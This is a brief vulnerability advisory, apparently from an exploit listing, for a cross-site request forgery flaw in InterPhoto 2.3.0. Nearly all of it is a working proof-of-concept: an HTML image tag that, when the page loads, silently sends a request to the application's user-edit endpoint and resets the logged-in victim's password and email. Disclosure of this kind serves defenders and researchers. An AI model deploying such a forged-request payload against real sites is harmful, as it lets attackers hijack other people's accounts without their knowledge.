Search
Software Vulnerability Tested On Date
InterPhoto 2.3.0 Cross-site Request Forgery Windows Vista + XAMPP 7/6/2010
Description
A vulnerability in InterPhoto 2.3.0 can be exploited to create a user's password.
Proof of Concept
<html>
    <body>
        <img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
    </body>
</html>